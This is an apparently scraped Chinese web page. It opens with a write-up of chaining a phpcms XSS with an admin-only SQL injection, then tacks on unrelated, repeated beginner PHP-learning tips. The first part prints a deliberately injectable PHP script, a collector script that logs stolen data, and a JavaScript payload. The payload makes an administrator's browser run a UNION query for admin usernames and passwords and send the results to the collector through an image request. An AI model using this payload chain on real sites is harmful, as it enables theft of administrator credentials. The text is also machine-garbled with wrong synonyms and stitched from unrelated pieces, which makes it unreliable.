PHP网页设计PHPcms使用xss履行sql注入

在学习HTML中我想边学边做是最有效的方式，当然这一方式对于学习PHP同样是最有效的。    昨天看见phpcms v9.1.15爆的xss和无权限的sql注入，因而就想测试下使用xss履行sql注入，固然爆的这个phpcms破绽还有良多其他的用法！然而，这个注入我没有找到phpcms v9.1.15测试，其他版本都没有测试胜利！
因而乎我只要设想下一个极端情况：
1.前台有且只要一个xss破绽（不克不及获得办理员cookie）
2.后台有且只要一个sql注入破绽（注入破绽文件只要办理员可以会见）
3.注入取得办理员暗码可解密
4.除以上无其他任何破绽（包含后台getwebshell）  其实我就是想说，咱们只可以使用这个xss履行注入！

摹拟注入破绽代码
   

• sqli.php
  01     <?php
  02      @error_reporting (E_ALL & ~E_NOTICE & ~E_WARNING);//毛病疏忽
  03      $con = mysql_connect("localhost","root","");
  04      if(!$con) {die('Could not connect: ' . mysql_error());}
  05      mysql_select_db("test",$con);
  06      $id = $_GET['xss'];
  07      $sql = "select id,realname from test where id="."$id";
  08      $view = mysql_query($sql);
  09      $row = mysql_fetch_array($view);
  10      echo $row[id]."<br />";
  11      echo $row[realname]."<br />";
  12     ?>
  

   

• mysql数据库：
  1     database：test
  2     table：test、admin
  3     column：test.id、test.realname
  4                  admin.id、admin.username、admin.password
  

   

• get.php（获得的注入后数据截取）
  1     <?php
  2      $file = fopen("data.txt","a");
  3      fwrite($file,$_GET['get']);
  4      fclose($file);
  5     ?>
  

   

• xsssqli.js（payload）
  01     function addLoadEvent(func)//窗口翻开加载多个函数
  02     {
  03      var oldfunc=window.onload; //页面翻开是加载办法
  04         if(typeof(window.onload)!="function")
  05         {
  06          window.onload=func;
  07         }
  08         else
  09         {
  10          window.onload=function()
  11          {
  12           oldfunc();
  13           func();
  14           }
  15          }
  16     }
  17     function get_xsssqli()
  18     {
  19      var url = "http://127.0.0.1/xss/sqli.php?xss=1%20and%201=2%20union%20select%20username,password%20from%20admin";
  20      var ajax = null;
  21      if(window.XMLHttpRequest)
  22      {
  23       ajax = new XMLHttpRequest();
  24      }
  25      else if(window.ActiveXObject)
  26      {
  27       ajax = new ActiveXObject("Microsoft.XMLHTTP");//ie6和一下老版本
  28      }
  29      else
  30      {
  31       return;
  32      }
  33      ajax.open("GET", url, true);
  34      ajax.send(null);
  35      ajax.onreadystatechange = function()
  36      {
  37       if(ajax.readyState == 4 && ajax.status == 200)
  38       {
  39        var img = document.createElement("img");
  40        img.src = "http://127.0.0.1/xss/get.php?get="+ajax.responseText;
  41        document.body.appendChild(img);
  42       }
  43      }
  44     }
  45     addLoadEvent(get_xsssqli);
  

   

• 摹拟xss破绽
  1     <html>
  2      <head>
  3       <title>use xss to sqli</title>
  4      </head>
  5      <body>
  6      <script src=http://127.0.0.1/xss/get.js ></script>
  7      </body>
  8     </html>
  

最初胜利失掉数据:

登录/注册后可看大图

固然你也能够写个正则截获指定命据！   来自：http://superman.php100.com/ 一些真正的强人总会搞出新玩意来丢给你，你不学就落后了，也印证了前人的经验，果然是学无止境啊!

做为1门年轻的语言，php一直很努力。

Apache不是非得用80或者8080端口的，我刚开始安得时候就是80端口老占用，就用了个 81端口，结果照常，就是输localhost的时候，应该输入为 localhost:81

再就是混迹于论坛啦，咱们的phpchina的论坛就很强大，提出的问题一般都是有达人去解答的，以前的帖子也要多看看也能学到不少前辈们的经验。别的不错的论坛例如php100，javaeye也是很不错的。

我还是强烈建议自己搭建php环境。因为在搭建的过程中你会遇到一些问题，通过搜索或是看php手册解决问题后，你会更加深刻的理解它们的工作原理，了解到php配置文件中的一些选项设置。

这些都是最基本最常用功能，我们这些菜鸟在系统学习后，可以先对这些功能深入研究。

爱上php，他也会爱上你。

对于初学者来说不推荐去拿钱买的。当然如果一个网站你经常去用，而且里面的资料也比较有用，最好还是买个会员比较好，毕竟那些也是别人的工作成果。

当留言板完成的时候，下步可以把做1个单人的blog程序，做为目标，

首先我是坚决反对新手上来就用框架的，因为对底层的东西一点都不了解，造成知识上的真空，会对以后的发展不利。我的观点上手了解下框架就好，代码还是手写。当然啦如果是位别的编程语言的高手的话，这个就另当别论啦。

环境搭建好,当你看见你的浏览器输出“it works\\\\\\\"时你一定是喜悦的。在你解决问题的时候，我强烈建议多读php手册。

开发工具也会慢慢的更专业，每个公司的可能不一样，但是zend studio是个大伙都会用的。

仓酷云

本人接触php时间不长，算是phper中的小菜鸟一只吧。由于刚开始学的时候没有名师指，碰过不少疙瘩，呗很多小问题卡过很久，白白浪费不少宝贵的时间，在次分享一些子的学习的心得。

爱上php，他也会爱上你。

我要在声明一下：我是个菜鸟！！我对php这门优秀的语言也是知之甚少。但是我要在这里说一下php在网站开发中最常用的几个功能：

我要在声明一下：我是个菜鸟！！我对php这门优秀的语言也是知之甚少。但是我要在这里说一下php在网站开发中最常用的几个功能：

,熟悉html,能用div+css，还有javascript，优先考虑linux。我在开始学习的时候，就想把这些知识一起学习，我天真的认为同时学习能够互相呼应，因为知识是相通的。

开发工具也会慢慢的更专业，每个公司的可能不一样，但是zend studio是个大伙都会用的。

当留言板完成的时候，下步可以把做1个单人的blog程序，做为目标，

真正的方向了，如果将来要去开发团队，你一定要学好smarty ,phplib这样的模板引擎，